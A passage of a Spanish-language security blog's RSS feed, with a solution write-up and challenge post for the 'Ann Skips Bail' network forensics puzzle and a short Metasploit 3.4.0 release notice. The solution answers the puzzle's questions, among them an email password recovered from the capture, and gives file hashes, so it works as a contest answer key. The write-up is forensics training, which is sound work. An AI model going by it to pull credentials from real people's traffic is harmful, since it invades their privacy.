inflating: word/theme/theme1.xml<br />
inflating: word/settings.xml<br />
inflating: word/webSettings.xml<br />
inflating: word/styles.xml<br />
inflating: docProps/core.xml<br />
inflating: word/numbering.xml<br />
inflating: word/fontTable.xml<br />
inflating: docProps/app.xml
</p></blockquote>
<p>Y encontraremos la imagen en &#8220;word/media/image1.png&#8221; para poder calcular su md5.</p>
<blockquote><p>
jano@hackbox:~/forensic/SANS/puzzle#2/word/media$ md5sum image1.png<br />
aadeace50997b1ba24b09ac2ef1940b7 word/media/image1.png
</p></blockquote>
<p>Hora de Contestar las preguntas.</p>
<p>1. ¿Cual es la dirección de correo de Ann?<br />
sneakyg33k@aol.com<br />
2. ¿Cual es la contraseña del correo de Ann?<br />
558r00lz<br />
3. ¿Cual es el correo electrónico del amante secreto de Ann?<br />
mistersecretx@aol.com<br />
4. ¿Que dos cosas ha pedido a su amante que lleve?<br />
Bring your fake passport and bathing suit<br />
5. ¿Cual es el nombre del fichero que adjuntó Ann en el email a su amante secreto?<br />
secretrendezvous.docx<br />
6. ¿Cual es el MD5sum del fichero adjunto que Ann envió a su amante secreto?<br />
9e423e11db88f01bbff81172839e1923<br />
7. ¿En que ciudad y país se encontrarán?<br />
Playa del Carmen, Mexico<br />
8. ?Cual es el MD5sum de la imagen adjuntada en el fichero?<br />
aadeace50997b1ba24b09ac2ef1940b7</p>
<p>Y con esto tendremos superada esta misión. Hasta la próxima.</p>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=150</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Serie S.I. &#8211; Ann skips bail &#8211; Presentación del reto</title>
		<link>http://erewhon-network.net/wordpress/?p=134</link>
		<comments>http://erewhon-network.net/wordpress/?p=134#comments</comments>
		<pubDate>Thu, 20 May 2010 23:08:46 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Serie SI -Security games]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=134</guid>
		<description><![CDATA[Buenos días señor hacker. Tras haber sido liberada bajo fianza, Ann Dercover ha desaparecido. Afortunadamente, los investigadores han estado monitorizando su actividad de red antes de dejar la ciudad.
Según el jefe de policia, se cree que Ann ha podido comunicarse con su amante secreto el señor X antes de dejar la ciudad. La captura de [...]]]></description>
			<content:encoded><![CDATA[<p>Buenos días señor hacker. Tras haber sido liberada bajo fianza, Ann Dercover ha desaparecido. Afortunadamente, los investigadores han estado monitorizando su actividad de red antes de dejar la ciudad.</p>
<p>Según el jefe de policia, se cree que Ann ha podido comunicarse con su amante secreto el señor X antes de dejar la ciudad. La captura de datos puede contener pistas para localizar su paradero.</p>
<p>Su misión, si desea aceptarla, es que envió Ann por email, donde ha ido y recoger pruebas incluyendo:<br />
1. ¿Cual es la dirección de correo de Ann?<br />
2. ¿Cual es la contraseña del correo de Ann?<br />
3. ¿Cual es el correo electrónico del amante secreto de Ann?<br />
4. ¿Que dos cosas ha pedido a su amante que lleve?<br />
5. ¿Cual es el nombre del fichero que adjuntó Ann en el email a su amante secreto?<br />
6. ¿Cual es el MD5sum del fichero adjunto que Ann envió a su amante secreto?<br />
7. ¿En que ciudad y país se encontrarán?<br />
8. ?Cual es el MD5sum de la imagen adjuntada en el fichero?</p>
<p>Como siempre, si usted o alguno de los miembros de su fuerza SI es capturado o resulta muerto, se negará cualquier conocimiento de sus acciones.</p>
<p><a href="http://forensicscontest.com/contest02/evidence02.pcap">Aqui</a> podrá encontrar la captura de datos.<br />
MD5 (evidence02.pcap) = cfac149a49175ac8e89d5b5b5d69bad3</p>
<p>&#8211; Fuente original &#8211;<br />
<a href="http://forensicscontest.com/2009/10/10/puzzle-2-ann-skips-bail">Network Forensics Puzzle Contest &raquo; Puzzle #2: Ann Skips Bail</a></p>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=134</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Serie S.I. -Presentación</title>
		<link>http://erewhon-network.net/wordpress/?p=139</link>
		<comments>http://erewhon-network.net/wordpress/?p=139#comments</comments>
		<pubDate>Thu, 20 May 2010 23:00:48 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Serie SI -Security games]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=139</guid>
		<description><![CDATA[Gracias a ehooo , he decidido crear la serie S.I. (Security Impossible) donde voy a intentar postear una vez por semana un reto de seguridad informática así como su solución uno o dos días después.
Espero que disfruteis tanto como yo con los retos.
]]></description>
			<content:encoded><![CDATA[<p>Gracias a <a href="http://rollanwar.net/">ehooo </a>, he decidido crear la serie S.I. (Security Impossible) donde voy a intentar postear una vez por semana un reto de seguridad informática así como su solución uno o dos días después.</p>
<p>Espero que disfruteis tanto como yo con los retos.</p>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=139</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Metasploit 3.4.0 liberado</title>
		<link>http://erewhon-network.net/wordpress/?p=119</link>
		<comments>http://erewhon-network.net/wordpress/?p=119#comments</comments>
		<pubDate>Thu, 20 May 2010 22:37:39 +0000</pubDate>
		<dc:creator>Jano</dc:creator>
				<category><![CDATA[Software]]></category>

		<guid isPermaLink="false">http://erewhon-network.net/wordpress/?p=119</guid>
		<description><![CDATA[Ha sido liberada la versión 3.4-0 del framework de pentesting Metasploit. Dicha release incluye mejoras en los payloads de meterpreter, una expansión de las capacidades de fuerza bruta del framework y la completa revisión del esquema de la base de datos y el subsistema de eventos. Por otro lado, se han añadido más de 100 [...]]]></description>
			<content:encoded><![CDATA[<p>Ha sido liberada la versión 3.4-0 del framework de pentesting Metasploit. Dicha release incluye mejoras en los payloads de meterpreter, una expansión de las capacidades de fuerza bruta del framework y la completa revisión del esquema de la base de datos y el subsistema de eventos. Por otro lado, se han añadido más de 100 nuevos módulos de exploits así como mas de 40 módulos auxiliares.</p>
<p>Para más información:<br />
<a href="http://www.metasploit.com/">The metasploit project </a><br />
<a href="http://www.metasploit.com/framework/download/">Descarga</a></p>
]]></content:encoded>
			<wfw:commentRss>http://erewhon-network.net/wordpress/?feed=rss2&amp;p=119</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
